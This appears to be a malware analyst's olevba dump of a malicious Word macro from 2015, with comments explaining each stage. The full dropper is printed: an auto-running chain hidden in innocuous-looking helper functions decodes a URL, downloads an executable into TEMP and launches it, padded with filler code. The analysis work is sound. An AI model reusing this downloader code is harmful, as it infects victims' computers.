dynamoo

Malicious Word macro

Nov 24th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V 20151009144829748.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 20151009144829748.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
      ' Entry point. olevba's summary table lists AutoOpen as AutoExec: it runs when the
      ' Word document is opened. The five calls below use names that look like text
      ' helpers or 6502-emulator opcodes, but in this listing each one performs a single
      ' step of a download-and-execute chain and then exits before its original body.
      ' NOTE(review): for detection, the visible behaviour is Word issuing an HTTP GET,
      ' writing <TEMP>\husemar.exe and then opening it via Shell.Application.
  16. PreencherDireita "", "", 0
      ' ^ creates the Microsoft.XMLHTTP object and opens a synchronous GET to the decoded URL
  17. runAlleStatMod
      ' ^ creates the ADODB.Stream, Shell.Application and WScript.Shell environment objects
  18. txs6502
      ' ^ reads TEMP, sends the request, builds the drop path, opens the stream in binary mode
  19. rora6502
      ' ^ writes the HTTP response body to the drop path
  20. IsDigit ""
      ' ^ the argument is ignored; the function opens the dropped file through Shell.Application
  21. End Sub
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28. -------------------------------------------------------------------------------
  29. VBA MACRO Module1.bas
  30. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/Module1'
  31. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  32. Public Const ads = "Adodb.Stream" ' ProgID given to CreateObject in runAlleStatMod (stream used to write the download)
  33. Public Const sha = "Shell.Application" ' ProgID given to CreateObject in runAlleStatMod (object whose Open is called in IsDigit)
  34. Public Const wss = "WScript.Shell" ' ProgID given to CreateObject in runAlleStatMod (source of the environment collection)
  35. Public Const ps = "Process" ' argument to .Environment(...) in runAlleStatMod; presumably keeps the literal away from the call site
  36. Public Function FormatarTexto(ByVal texto As String, ParamArray formatos() As Variant) As String
      ' Substitutes "$<digits>" placeholders in texto with entries from formatos.
      ' Nothing in the autoopen chain of this listing calls this function, so it looks
      ' like borrowed filler code. NOTE(review): it calls IsDigit, which in this sample
      ' has been altered to open the dropped file and return before testing the character.
  37.  Dim i As Long
  38.  Dim formats_size As Integer
  39.  Dim formated_text As String
  40.  Dim text_size As Integer
  41.  Dim tokens() As String
  42.  Dim ch As String
  43.  Dim format_token_position_string As String
  44.  Dim format_token_position As Integer
  45.  Dim is_digit As Boolean
  46.  Dim lower_bound As Integer
  47.  Dim formato() As Variant
  48.  Dim sub_formato() As Variant
  49.  Dim last_dimenssion As Integer
  50.  formato = formatos
      ' Repeatedly unwraps formato(0) until the assignment raises an error, which
      ' jumps to Singl. The Multi label is only reached by falling out of the loop.
  51.  On Error GoTo Singl
  52.  For i = 0 To 60000
  53.  sub_formato = formato(0)
  54.  formato = sub_formato
  55.  Next i
  56. Multi:
  57.  formato = formatos(0)
  58. Singl:
      ' Error trapping is switched off again here, so the Catch label further down is
      ' never the target of an On Error statement in this function.
  59.  On Error GoTo 0
  60.  i = 1
  61.  formats_size = UBound(formato)
  62.  text_size = Len(texto)
  63.  If formats_size = 0 Then
  64.  formated_text = texto
  65.  GoTo Finally
  66.  End If
  67.  Do While i <= text_size
  68.  ch = Mid(texto, i, 1)
  69.  If ch = "$" Then
  70.  format_token_position_string = ""
  71.  i = i + 1
  72.  Do While i <= text_size
  73.  ch = Mid(texto, i, 1)
      ' In this sample IsDigit never evaluates ch (see its Exit Function); it returns
      ' the Boolean default instead.
  74.  is_digit = IsDigit(ch)
  75.  If is_digit Then
  76.  format_token_position_string = ch & format_token_position_string
  77.  End If
  78.  If Not is_digit Or i = text_size Then
  79.  format_token_position = CInt(format_token_position_string) - 1
  80.  If format_token_position <= formats_size Then
  81.  formated_text = formated_text & CStr(formato(format_token_position)) + ch
  82.  Else
  83.  formated_text = formated_text & "$" & CStr(format_token_position - formats_size) + ch
  84.  End If
  85.  Exit Do
  86.  End If
  87.  i = i + 1
  88.  Loop
  89.  Else
  90.  formated_text = formated_text & ch
  91.  End If
  92.  i = i + 1
  93.  Loop
  94.  GoTo Finally
  95. Catch:
  96.  formated_text = Err.Description
  97. Finally:
  98.  FormatarTexto = formated_text
  99. End Function
  100. Public Function phy650_3_3(phy650_3_1() As Variant, phy650_3_2 As Integer) As String
       ' String decoder for the download URL. Each array element is turned into one
       ' character by subtracting (phy650_3_2 + 2845) and passing the result to Chr.
       ' PreencherDireita calls it with phy650_3_2 = 44, so the effective offset there is
       ' 2889. Because the transform is a fixed subtraction, the plaintext can be
       ' recovered statically from the array without running the macro.
  101.     Dim i As Integer
  102.     Dim result As String
  103.     result = ""
  104.     For i = LBound(phy650_3_1) To UBound(phy650_3_1)
  105.         result = result & Chr(phy650_3_1(i) - phy650_3_2 - 2845)
  106.     Next i
  107.     phy650_3_3 = result
  108. End Function
  109. Public Function PreencherEsquerda( _
  110.  ByVal texto As String, _
  111.  ByVal caracter_a_preencher As String, _
  112.  ByVal tamanho_final As Integer, _
  113.  Optional truncar As Boolean _
  114. ) As String
       ' Left-pads texto with caracter_a_preencher up to tamanho_final characters; when
       ' texto is already longer it is cut to tamanho_final only if truncar is True.
       ' Unlike its sibling PreencherDireita, this copy contains no injected statements
       ' and is not called by the autoopen chain in this listing.
  115.  Dim novo_texto As String
  116.  Dim quantidade_a_adicionar As Integer
  117.  novo_texto = texto
  118.  quantidade_a_adicionar = tamanho_final - Len(texto)
  119.  If quantidade_a_adicionar < 0 Then
  120.  If truncar Then
  121.  novo_texto = Mid(texto, 1, tamanho_final)
  122.  End If
  123.  GoTo Finally
  124.  End If
  125.  novo_texto = Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher) + novo_texto
  126. Catch:
  127. Finally:
  128.  PreencherEsquerda = novo_texto
  129. End Function
  130. Function PreencherDireita( _
  131.  ByVal texto As String, _
  132.  ByVal caracter_a_preencher As String, _
  133.  ByVal tamanho_final As Integer, _
  134.  Optional truncar As Boolean _
  135. )
       ' Right-padding helper that also carries the first stage of the downloader.
       ' autoopen calls it as PreencherDireita "", "", 0, so the padding logic does
       ' nothing useful there; the effect that matters is the four unindented statements.
  136.  Dim novo_texto As String
  137.  Dim quantidade_a_adicionar As Integer
       ' The ProgID is split across a concatenation, which keeps the literal
       ' "Microsoft.XMLHTTP" out of the source text (olevba still reports it as a
       ' VBA string expression). The object is kept in the module-level phy65007.
  138. Set phy65007 = CreateObject("Microsoft" + ".XMLHTTP")
  139. Dim urlAr() As Variant
       ' Encoded URL. With the key 44 passed below, phy650_3_3 subtracts 2889 from each
       ' value: the first seven elements decode to "http://" and the last four to ".exe".
  140. urlAr = Array(2993, 3005, 3005, 3001, 2947, 2936, 2936, 2995, 2986, 2999, 2986, 2989, 3006, 2988, 2993, 2986, 2999, 3000, 3007, 2986, 2935, 3008, 3011, 2935, 2988, 3011, 2936, 2944, 2944, 2941, 2942, 2992, 2989, 2936, 2941, 2989, 2992, 3003, 2992, 2989, 2992, 2935, 2990, 3009, 2990)
       ' Prepares a GET request; the third argument False makes it synchronous. The
       ' request is not sent here - Send is called later in txs6502.
  141. phy65007.Open "GET", phy650_3_3(urlAr, 44), False
       ' From here on this is the unmodified padding logic.
  142.  novo_texto = texto
  143.  quantidade_a_adicionar = tamanho_final - Len(texto)
  144.  If quantidade_a_adicionar < 0 Then
  145.  If truncar Then
  146.  novo_texto = Mid(texto, 1, tamanho_final)
  147.  End If
  148.  GoTo Finally
  149.  End If
  150.  novo_texto = novo_texto + Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher)
  151. Catch:
  152. Finally:
  153.  PreencherDireita = novo_texto
  154. End Function
  155. Function RGB( _
  156.  ByVal red As Integer, _
  157.  ByVal green As Integer, _
  158.  ByVal blue As Integer _
  159. ) As Long
       ' Thin wrapper that forwards to VBA.Information.RGB. Not called by the autoopen
       ' chain in this listing.
  160.  RGB = VBA.Information.RGB(red, green, blue)
  161. End Function
  162. Public Function Juntar( _
  163.  ByVal separador As String, _
  164.  ParamArray elementos() As Variant _
  165. ) As String
       ' Joins elementos with separador using the built-in Join. Not called by the
       ' autoopen chain in this listing.
  166.  Juntar = Join(elementos, separador)
  167. End Function
  168. Public Function IsDigit(ByVal ch As String) As Boolean
       ' Final stage of the chain: despite the name, the first statement calls Open on
       ' phy650003 (the Shell.Application object created in runAlleStatMod) with
       ' phy650002, the <TEMP>\husemar.exe path built in txs6502. The call is split over
       ' a line continuation, so the text "phy650003.Open" never appears on one line.
       ' Exit Function follows immediately: ch is never examined, the return value stays
       ' at the Boolean default, and the digit test below is unreachable.
  169. phy650003. _
  170. Open (phy650002)
  171. Exit Function
  172.  Dim asc_code As Integer
  173.  asc_code = Asc(ch)
  174.  IsDigit = (asc_code > 48 And asc_code < 58)
  175. End Function
  176.  
  177.  
  178.  
  179.  
  180.  
  181.  
  182. -------------------------------------------------------------------------------
  183. VBA MACRO Module2.bas
  184. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/Module2'
  185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  186. Public phy65007 As Object ' Microsoft.XMLHTTP request object (set in PreencherDireita)
  187. Public phy65008 As Object ' ADODB.Stream that receives the response body (set in runAlleStatMod)
  188. Public phy65009  As Object ' WScript.Shell "Process" environment collection (set in runAlleStatMod)
  189. Public phy650001 As String ' value of the TEMP environment variable (set in txs6502)
  190. Public phy650002 As String ' full drop path, TEMP & "\husemar.exe" (set in txs6502)
  191. Public phy650003 As Object ' Shell.Application object used to open the dropped file (set in runAlleStatMod)
  192. Public Sub runAlleStatMod()
       ' Second stage of the autoopen chain: instantiates the COM objects the later
       ' stages use, then returns. The ProgIDs come from the constants in Module1
       ' (ads, sha, wss, ps), so no object name appears literally at the call sites.
  193.  Dim kuerzel As Variant
  194.  Dim nameTN As Variant
  195.  Set phy65008 = CreateObject(ads)
  196.  Set phy650003 = CreateObject(sha)
  197.  
       ' Environment("Process") yields the process environment collection that
       ' txs6502 indexes with "TEMP".
  198. Set phy65009 = CreateObject(wss).Environment(ps)
       ' Everything after this Exit Sub is unreachable. NOTE(review): several identifiers
       ' below contain a stray dot (setzteBezugsjah.rImStatischenModell, gibT.Nname) that
       ' the apparently related names in runEinStatMod do not, which suggests the filler
       ' text was mangled on purpose - confirm against other samples.
  199. Exit Sub
  200.  setzteBezugsjah.rImStatischenModell
  201.  erstelleKo.pfzeileMETA
  202.  erstelleMi.ttelwerteMETA
  203.  For Each kuerzel In gibAlleTN_Kuerzel
  204.  If kuerzel = "SH" Or kuerzel = "AG" Then
  205.  Else
  206.  nameTN = gibT.Nname(kuerzel)
  207.  runSFA nameTN
  208.  exportiereSta.tischeResultateSFA nameTN
  209.  erstelleP.DFundPNG nameTN
  210.  End If
  211.  Next kuerzel
  212.  If TEST = False Then _
  213.  MsgBox "Die statischen Modelle sind fertig bearbeitet." & vbNewLine & _
  214.  "Die Kantone AG und SH wurden nicht berechnet.", vbInformation
  215. End Sub
  216. Sub runEinStatMod()
       ' Filler: not called by the autoopen chain in this listing. The helpers it
       ' references (setzteBezugsjahrImStatischenModell, gibAlleOderNameTN) are not
       ' defined anywhere in the dumped modules.
  217.  Dim nameTN As String
  218.  setzteBezugsjahrImStatischenModell
  219.  nameTN = gibAlleOderNameTN
  220.  runSFA nameTN
  221. End Sub
  222. Sub runSFA(ByVal nameTN As String)
       ' Filler: only referenced from runEinStatMod and from the unreachable tail of
       ' runAlleStatMod. It uses Excel objects (Workbooks, Application.StatusBar) even
       ' though olevba identifies the container as a Word document.
       ' NOTE(review): wbSFA is declared As String but used with Set and as a workbook,
       ' and the three Application.Run calls have empty names - the code looks like
       ' altered copy-paste, not something meant to run.
  223.  Dim wbSFA As String
  224.  Dim pfadSFA As String
  225.  pfadSFA = gibPfadZumStat_Modell & gibName_Statisches_Modell
  226.  Application.ScreenUpdating = False
  227.  Application.StatusBar = True
  228.  Application.StatusBar = "Es wird " & nameTN & " bearbeitet."
  229.  kopiereDefault_stat nameTN, gibBezugsjahr
  230.  kopiereAngabenTN nameTN
  231.  On Error Resume Next
  232.  Set wbSFA = Workbooks(pfadSFA)
  233.  If wbSFA Is Nothing Then _
  234.  Set wbSFA = Workbooks.Open(pfadSFA)
  235.  setzeAlleineOderAlleImModell wbSFA
  236.  importiereDefaultwerteInsModell wbSFA
  237.  importiereDATAinsModell wbSFA
  238.  kopiereDefaultWerteImModell wbSFA
  239.  Application.Run ""
  240.  Application.Run ""
  241.  Application.Run ""
  242.  Application.StatusBar = ""
  243.  Application.ScreenUpdating = True
  244.  If gibAlleOderNameTN <> "Alle" Then
  245.  wbSFA.Activate
  246.  wbSFA.Save
  247.  If TEST = False Then
  248.  MsgBox "Das Modell kann nun bearbeitet werden. " & _
  249.  "Ge?nderte Default-Werte werden beim Schliessen exportiert.", vbInformation
  250.  End If
  251.  End
  252.  Else
  253.  wbSFA.Close SaveChanges:=True
  254.  Set wbSFA = Nothing
  255.  End If
  256. End Sub
  257. Private Sub importiereDefaultwerteInsModell(wbModell As String)
       ' Filler: copies two column ranges from a "Default_stat.dDATA" workbook into the
       ' ".Default" sheet of the model workbook. Only referenced from runSFA, which the
       ' autoopen chain in this listing never calls.
       ' NOTE(review): wbDefault is declared As String yet assigned with Set.
  258.  Dim wbDefault As String
  259.  Dim wsModell As Worksheet
  260.  Dim wsWerte As Worksheet
  261.  Dim LETZTE_ZEILE_PARAMETER As Integer
  262.  LETZTE_ZEILE_PARAMETER = 52
  263.  On Error Resume Next
  264.  Set wbDefault = Workbooks.Open(gibPfadZumStat_Modell & "Default_stat.dDATA")
  265.  Set wsWerte = wbDefault.Worksheets("Tabelle1")
  266.  Set wsModell = Workbooks(gibName_Statisches_Modell).Worksheets(".Default")
  267.  wsWerte.Range("E1:E" & LETZTE_ZEILE_PARAMETER).Copy
  268.  wsModell.Range("F1:F" & LETZTE_ZEILE_PARAMETER).PasteSpecial xlPasteValues
  269.  Application.CutCopyMode = False
  270.  wsWerte.Range("N1:N27").Copy
  271.  wsModell.Range("N1:N27").PasteSpecial xlPasteValues
  272.  Application.CutCopyMode = False
  273.  wbDefault.Close
  274.  Set wbDefault = Nothing
  275. End Sub
  276. Private Sub importiereDATAinsModell(wbModell As String)
       ' Filler: copies fixed ranges from "\DATA_stat.xls" into the "Bauwerk",
       ' ".Fluesse", ".Params" and ".Default" sheets of the model workbook. Only
       ' referenced from runSFA, which the autoopen chain in this listing never calls.
       ' NOTE(review): the eight FormulaLocal assignments near the end are all just
       ' "=", which looks like the original formulas were stripped out.
  277.  Dim wbVon, wbNach As String
  278.  Dim wsVon, wsNach As Worksheet
  279.  Set wbVon = Workbooks.Open(gibPfadZumStat_Modell & "\DATA_stat.xls")
  280.  Set wbNach = wbModell
  281.  Set wsNach = wbModell.Worksheets("Bauwerk")
  282.  Set wsVon = wbVon.Worksheets("HB_GebVol")
  283.  wsVon.Range("B2:G7").Copy
  284.  wsNach.Range("C4:H9").PasteSpecial xlPasteValues
  285.  Set wsVon = wbVon.Worksheets("HB_Material")
  286.  wsVon.Range("B2:G9").Copy
  287.  wsNach.Range("C14:H21").PasteSpecial xlPasteValues
  288.  Set wsVon = wbVon.Worksheets("HB_Mat_Neubau")
  289.  wsVon.Range("B2:G9").Copy
  290.  wsNach.Range("C26:H33").PasteSpecial xlPasteValues
  291.  Set wsVon = wbVon.Worksheets("TB")
  292.  wsVon.Range("B10:I12").Copy
  293.  wsNach.Range("C37:E44").PasteSpecial Paste:=xlPasteValues, Transpose:=True
  294.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
  295.  Set wsNach = wbNach.Worksheets(".Fluesse")
  296.  wsVon.Range("E4:G25").Copy
  297.  wsNach.Range("D4:F25").PasteSpecial xlPasteValues
  298.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
  299.  Set wsNach = wbNach.Worksheets(".Params")
  300.  wsVon.Range("E23:E24").Copy
  301.  wsNach.Range("F4:F5").PasteSpecial xlPasteValues
  302.  Application.CutCopyMode = False
  303.  wbVon.Close
  304.  Set wsNach = wbNach.Sheets(".Default")
  305.  wsNach.Range("F26").FormulaLocal = "="
  306.  wsNach.Range("F27").FormulaLocal = "="
  307.  wsNach.Range("F28").FormulaLocal = "="
  308.  wsNach.Range("F29").FormulaLocal = "="
  309.  wsNach.Range("F31").FormulaLocal = "="
  310.  wsNach.Range("F32").FormulaLocal = "="
  311.  wsNach.Range("F33").FormulaLocal = "="
  312.  wsNach.Range("F34").FormulaLocal = "="
  313.  Set wbVon = Nothing
  314.  Set wbNach = Nothing
  315. End Sub
  316. Private Sub kopiereDefaultWerteImModell(wbModell As String)
       ' Filler: copies F1:F52 of the ".Default" sheet to G1:G52 of "Variablen",
       ' unhiding the source sheet for the duration of the copy. Only referenced from
       ' runSFA, which the autoopen chain in this listing never calls.
  317.  Dim wsVon As Worksheet, wsNach As Worksheet
  318.  Set wsVon = wbModell.Sheets(".Default")
  319.  Set wsNach = wbModell.Sheets("Variablen")
  320.  wsVon.Visible = True
  321.  wsNach.Range("G1:G52").Value = wsVon.Range("F1:F52").Value
  322.  wsVon.Visible = False
  323. End Sub
  324.  
  325.  
  326.  
  327.  
  328.  
  329.  
  330. -------------------------------------------------------------------------------
  331. VBA MACRO Module3.bas
  332. in file: 20151009144829748.doc - OLE stream: u'Macros/VBA/Module3'
  333. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  334.  
  335. ' This is where all 6502 instructions are kept.
  336. Public Sub adc6502()
  337.  Dim tmp As Long ' Integer
  338. adrmode opcode
  339.  Value = Read6502(savepc)
  340.  saveflags = (P And &H1)
  341.  sum = A
  342.  sum = (sum + Value) And &HFF
  343.  sum = (sum + saveflags) And &HFF
  344.  If (sum > &H7F) Or (sum < -&H80) Then
  345.  P = P Or &H40
  346.  Else
  347.  P = (P And &HBF)
  348.  End If
  349.  sum = A + (Value + saveflags)
  350.  If (sum > &HFF) Then
  351.  P = P Or &H1
  352.  Else
  353.  P = (P And &HFE)
  354.  End If
  355.  A = sum And &HFF
  356.  If (P And &H8) Then
  357.  P = (P And &HFE)
  358.  If ((A And &HF) > &H9) Then
  359.  A = (A + &H6) And &HFF
  360.  End If
  361.  If ((A And &HF0) > &H90) Then
  362.  A = (A + &H60) And &HFF
  363.  P = P Or &H1
  364.  End If
  365.  Else
  366.  clockticks6502 = clockticks6502 + 1
  367.  End If
  368.  SetFlags A
  369. End Sub
  370. Public Sub adrmode(opcode As Byte)
  371. Select Case addrmode(opcode)
  372.  Case ADR_ABS: savepc = Read6502(PC) + (Read6502(PC + 1) * &H100&): PC = PC + 2
  373.  Case ADR_ABSX: absx6502
  374.  Case ADR_ABSY: absy6502
  375.  Case ADR_IMP: ' nothing really necessary cause implied6502 = ""
  376. Case ADR_IMM: savepc = PC: PC = PC + 1
  377.  Case ADR_INDABSX: indabsx6502
  378.  Case ADR_IND: indirect6502
  379.  Case ADR_INDX: indx6502
  380.  Case ADR_INDY: indy6502
  381.  Case ADR_INDZP: indzp6502
  382.  Case ADR_REL: savepc = Read6502(PC): PC = PC + 1: If (savepc And &H80) Then savepc = savepc - &H100&
  383.  Case ADR_ZP: savepc = Read6502(PC): savepc = savepc And &HFF: PC = PC + 1
  384.  Case ADR_ZPX: zpx6502
  385.  Case ADR_ZPY: zpy6502
  386.  Case Else: Debug.Print addrmode(opcode)
  387. End Select
  388. End Sub
  389. Public Sub and6502()
  390.  adrmode opcode
  391.  Value = Read6502(savepc)
  392.  A = (A And Value)
  393.  SetFlags A
  394. End Sub
  395. Public Sub asl6502()
  396.  adrmode opcode
  397.  Value = Read6502(savepc)
  398.  P = (P And &HFE) Or ((Value \ 128) And &H1)
  399.  Value = (Value * 2) And &HFF
  400.  Write6502 savepc, (Value And &HFF)
  401.  SetFlags Value
  402. End Sub
  403. Public Sub asla6502()
  404.  P = (P And &HFE) Or ((A \ 128) And &H1)
  405.  A = (A * 2) And &HFF
  406.  SetFlags A
  407. End Sub
  408. Public Sub bcc6502()
  409.  If ((P And &H1) = 0) Then
  410.  adrmode opcode
  411.  PC = PC + savepc
  412.  clockticks6502 = clockticks6502 + 1
  413.  Else
  414.  PC = PC + 1
  415.  End If
  416. End Sub
  417. Public Sub bcs6502()
  418.  If (P And &H1) Then
  419.  adrmode opcode
  420.  PC = PC + savepc
  421.  clockticks6502 = clockticks6502 + 1
  422.  Else
  423.  PC = PC + 1
  424.  End If
  425. End Sub
  426. Public Sub beq6502()
  427.  If (P And &H2) Then
  428.  adrmode opcode
  429.  PC = PC + savepc
  430.  clockticks6502 = clockticks6502 + 1
  431.  Else
  432.  PC = PC + 1
  433.  End If
  434. End Sub
  435. Public Sub bit6502()
  436.  adrmode opcode
  437.  Value = Read6502(savepc)
  438.  If (Value And A) Then
  439.  P = (P And &HFD)
  440.  Else
  441.  P = P Or &H2
  442.  End If
  443.  P = ((P And &H3F) Or (Value And &HC0))
  444. End Sub
  445. Public Sub bmi6502()
  446.  If (P And &H80) Then
  447.  adrmode opcode
  448.  PC = PC + savepc
  449.  clockticks6502 = clockticks6502 + 1
  450.  Else
  451.  PC = PC + 1
  452.  End If
  453. End Sub
  454. Public Sub bne6502()
  455.  If ((P And &H2) = 0) Then
  456.  adrmode opcode
  457.  PC = PC + savepc
  458.  Else
  459.  PC = PC + 1
  460.  End If
  461. End Sub
  462. Public Sub bpl6502()
  463.  If ((P And &H80) = 0) Then
  464.  adrmode opcode
  465.  PC = PC + savepc
  466.  Else
  467.  PC = PC + 1
  468.  End If
  469. End Sub
  470. Public Sub brk6502()
  471.  PC = PC + 1
  472.  Write6502 &H100& + s, (PC \ &H100&) And &HFF
  473.  s = (s - 1) And &HFF
  474.  Write6502 &H100& + s, (PC And &HFF)
  475.  s = (s - 1) And &HFF
  476.  Write6502 &H100& + s, P
  477.  s = (s - 1) And &HFF
  478.  P = P Or &H14
  479.  PC = Read6502(&HFFFE&) + (Read6502(&HFFFF&) * &H100&)
  480. End Sub
  481. Public Sub bvc6502()
  482.  If ((P And &H40) = 0) Then
  483.  adrmode opcode
  484.  PC = PC + savepc
  485.  clockticks6502 = clockticks6502 + 1
  486.  Else
  487.  PC = PC + 1
  488.  End If
  489. End Sub
  490. Public Sub bvs6502()
  491.  If (P And &H40) Then
  492.  adrmode opcode
  493.  PC = PC + savepc
  494.  clockticks6502 = clockticks6502 + 1
  495.  Else
  496.  PC = PC + 1
  497.  End If
  498. End Sub
  499. Public Sub clc6502()
  500.  P = P And &HFE
  501. End Sub
  502. Public Sub cld6502()
  503.  P = P And &HF7
  504. End Sub
  505. Public Sub cli6502()
  506.  P = P And &HFB
  507. End Sub
  508. Public Sub clv6502()
  509.  P = P And &HBF
  510. End Sub
  511. Public Sub cmp6502()
  512.  adrmode opcode
  513.  Value = Read6502(savepc)
  514.  If (A + &H100 - Value) > &HFF Then
  515.  P = P Or &H1
  516.  Else
  517.  P = (P And &HFE)
  518.  End If
  519.  Value = (A + &H100 - Value) And &HFF
  520.  SetFlags Value
  521. End Sub
  522. Public Sub cpx6502()
  523.  adrmode opcode
  524.  Value = Read6502(savepc)
  525.  If (X + &H100 - Value > &HFF) Then
  526.  P = P Or &H1
  527.  Else
  528.  P = (P And &HFE)
  529.  End If
  530.  Value = (X + &H100 - Value) And &HFF
  531.  SetFlags Value
  532. End Sub
  533. Public Sub cpy6502()
  534.  adrmode opcode
  535.  Value = Read6502(savepc)
  536.  If (Y + &H100 - Value > &HFF) Then
  537.  P = (P Or &H1)
  538.  Else
  539.  P = (P And &HFE)
  540.  End If
  541.  Value = (Y + &H100 - Value) And &HFF
  542.  SetFlags Value
  543. End Sub
  544. Public Sub dec6502()
  545.  adrmode opcode
  546.  Write6502 (savepc), (Read6502(savepc) - 1) And &HFF
  547.  Value = Read6502(savepc)
  548.  If (Value) Then
  549.  P = P And &HFD
  550.  Else
  551.  P = P Or &H2
  552.  End If
  553.  If (Value And &H80) Then
  554.  P = P Or &H80
  555.  Else
  556.  P = P And &H7F
  557.  End If
  558. End Sub
  559. Public Sub dex6502()
  560.  X = (X - 1) And &HFF
  561.  If (X) Then
  562.  P = P And &HFD
  563.  Else
  564.  P = P Or &H2
  565.  End If
  566.  If (X And &H80) Then
  567.  P = P Or &H80
  568.  Else
  569.  P = P And &H7F
  570.  End If
  571. End Sub
  572. Public Sub dey6502()
  573.  Y = (Y - 1) And &HFF
  574.  If (Y) Then
  575.  P = P And &HFD
  576.  Else
  577.  P = P Or &H2
  578.  End If
  579.  If (Y And &H80) Then
  580.  P = P Or &H80
  581.  Else
  582.  P = P And &H7F
  583.  End If
  584. End Sub
  585. Public Sub eor6502()
  586.  adrmode opcode
  587.  A = A Xor Read6502(savepc)
  588.  If (A) Then
  589.  P = P And &HFD
  590.  Else
  591.  P = P Or &H2
  592.  End If
  593.  If (A And &H80) Then
  594.  P = P Or &H80
  595.  Else
  596.  P = P And &H7F
  597.  End If
  598. End Sub
  599. Public Sub inc6502()
  600.  adrmode opcode
  601.  Write6502 (savepc), (Read6502(savepc) + 1) And &HFF
  602.  Value = Read6502(savepc)
  603.  If (Value) Then
  604.  P = P And &HFD
  605.  Else
  606.  P = P Or &H2
  607.  End If
  608.  If (Value And &H80) Then
  609.  P = P Or &H80
  610.  Else
  611.  P = P And &H7F
  612.  End If
  613. End Sub
  614. Public Sub inx6502()
  615.  X = (X + 1) And &HFF
  616.  If (X) Then
  617.  P = P And &HFD
  618.  Else
  619.  P = P Or &H2
  620.  End If
  621.  If (X And &H80) Then
  622.  P = P Or &H80
  623.  Else
  624.  P = P And &H7F
  625.  End If
  626. End Sub
  627. Public Sub iny6502()
  628.  Y = (Y + 1) And &HFF
  629.  If (Y) Then
  630.  P = P And &HFD
  631.  Else
  632.  P = P Or &H2
  633.  End If
  634.  If (Y And &H80) Then
  635.  P = P Or &H80
  636.  Else
  637.  P = P And &H7F
  638.  End If
  639. End Sub
  640. Public Sub jmp6502()
  641.  adrmode opcode
  642.  PC = savepc
  643. End Sub
  644. Public Sub jsr6502()
  645.  PC = PC + 1
  646.  Write6502 s + &H100&, (PC \ &H100&)
  647.  s = (s - 1) And &HFF
  648.  Write6502 s + &H100&, (PC And &HFF)
  649.  s = (s - 1) And &HFF
  650.  PC = PC - 1
  651.  adrmode opcode
  652.  PC = savepc
  653. End Sub
  654. Public Sub lda6502()
  655.  adrmode opcode
  656.  A = Read6502(savepc)
  657.  If (A) Then
  658.  P = P And &HFD
  659.  Else
  660.  P = P Or &H2
  661.  End If
  662.  If (A And &H80) Then
  663.  P = P Or &H80
  664.  Else
  665.  P = P And &H7F
  666.  End If
  667. End Sub
  668. Public Sub ldx6502()
  669.  adrmode opcode
  670.  X = Read6502(savepc)
  671.  If (X) Then
  672.  P = P And &HFD
  673.  Else
  674.  P = P Or &H2
  675.  End If
  676.  If (X And &H80) Then
  677.  P = P Or &H80
  678.  Else
  679.  P = P And &H7F
  680.  End If
  681. End Sub
  682. Public Sub ldy6502()
  683.  adrmode opcode
  684.  Y = Read6502(savepc)
  685.  If (Y) Then
  686.  P = P And &HFD
  687.  Else
  688.  P = P Or &H2
  689.  End If
  690.  If (Y And &H80) Then
  691.  P = P Or &H80
  692.  Else
  693.  P = P And &H7F
  694.  End If
  695. End Sub
  696. Public Sub lsr6502()
  697.  adrmode opcode
  698.  Value = Read6502(savepc)
  699.  P = ((P And &HFE) Or (Value And &H1))
  700.  Value = (Value \ 2) And &HFF
  701.  Write6502 savepc, (Value And &HFF)
  702.  If (Value) Then
  703.  P = P And &HFD
  704.  Else
  705.  P = P Or &H2
  706.  End If
  707.  If (Value And &H80) Then
  708.  P = P Or &H80
  709.  Else
  710.  P = P And &H7F
  711.  End If
  712. End Sub
  713. Public Sub lsra6502()
  714.  P = (P And &HFE) Or (A And &H1)
  715.  A = (A \ 2) And &HFF
  716.  If (A) Then
  717.  P = P And &HFD
  718.  Else
  719.  P = P Or &H2
  720.  End If
  721.  If (A And &H80) Then
  722.  P = P Or &H80
  723.  Else
  724.  P = P And &H7F
  725.  End If
  726. End Sub
  727. Public Sub nop6502()
  728. 'TS: Implemented complex code structure ;)
  729. End Sub
  730. Public Sub ora6502()
  731.  adrmode opcode
  732.  A = A Or Read6502(savepc)
  733.  If (A) Then
  734.  P = P And &HFD
  735.  Else
  736.  P = P Or &H2
  737.  End If
  738.  If (A And &H80) Then
  739.  P = P Or &H80
  740.  Else
  741.  P = P And &H7F
  742.  End If
  743. End Sub
  744. Public Sub pha6502()
  745.  Write6502 &H100& + s, A
  746.  s = (s - 1) And &HFF
  747. End Sub
  748. Public Sub php6502()
  749.  Write6502 &H100& + s, P
  750.  s = (s - 1) And &HFF
  751. End Sub
  752. Public Sub pla6502()
  753.  s = (s + 1) And &HFF
  754.  A = Read6502(s + &H100)
  755.  If (A) Then
  756.  P = P And &HFD
  757.  Else
  758.  P = P Or &H2
  759.  End If
  760.  If (A And &H80) Then
  761.  P = P Or &H80
  762.  Else
  763.  P = P And &H7F
  764.  End If
  765. End Sub
  766. Public Sub plp6502()
  767.  s = (s + 1) And &HFF
  768.  P = Read6502(s + &H100) Or &H20
  769. End Sub
  770. Public Sub rol6502()
  771.  saveflags = (P And &H1)
  772.  adrmode opcode
  773.  Value = Read6502(savepc)
